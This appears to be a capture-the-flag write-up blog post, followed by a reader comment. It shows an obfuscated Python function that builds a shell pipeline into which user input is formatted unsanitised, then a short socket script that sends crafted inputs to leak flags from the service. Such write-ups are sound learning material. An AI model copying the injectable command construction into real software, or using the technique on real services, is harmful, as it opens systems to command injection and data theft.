We received the source code in a .deb package, which we unpacked using 7zip. Looking through the files we discovered a Python file named, of course, "temperature". We then began to look through the code and found a series of replace commands.
def build_command():
fn = "satan"
fn = fn.replace("s","r")
fn = fn.replace("a","e")
fn = fn.replace("t","v")
fn = fn.replace("s","r")
fn = fn.replace("n","n")
fn = fn[::-1]
fn += '\x67'
fn += '\x75'
fn += '\x65'
fn += '\x73'
fn += '\x73'
cn = "dog"
cn = cn.replace("d","c")
cn = cn.replace("g","t")
cn = cn.replace("o","a")
cn2 = "\x67\x72\x65\x70"
cn3 = "\x61\x77\x6B"
command = " ".join((cn,fn,"|",cn2,"%s","|",cn2,"%s","|",cn3,"'{print $3}'"))
return command
Which we quickly realized allows anything to be put into the command. We decided to see what could be found by sending "no" to the inputs for the lookup command
By sending "no" to both inputs, we were able to get a list of flags, indicated by "FLG" at the beginning of each flag." restricted the output to just the third column, Our final script is below:
def get_awesomeness(s, flag_id):
s.recv(1024)
s.send("10")
s.recv(1024)
s.send("no")
s.recv(1024)
s.send(flag_id)
flag = s.recv(1024).strip()
return flag
Great, Thanks !
ReplyDelete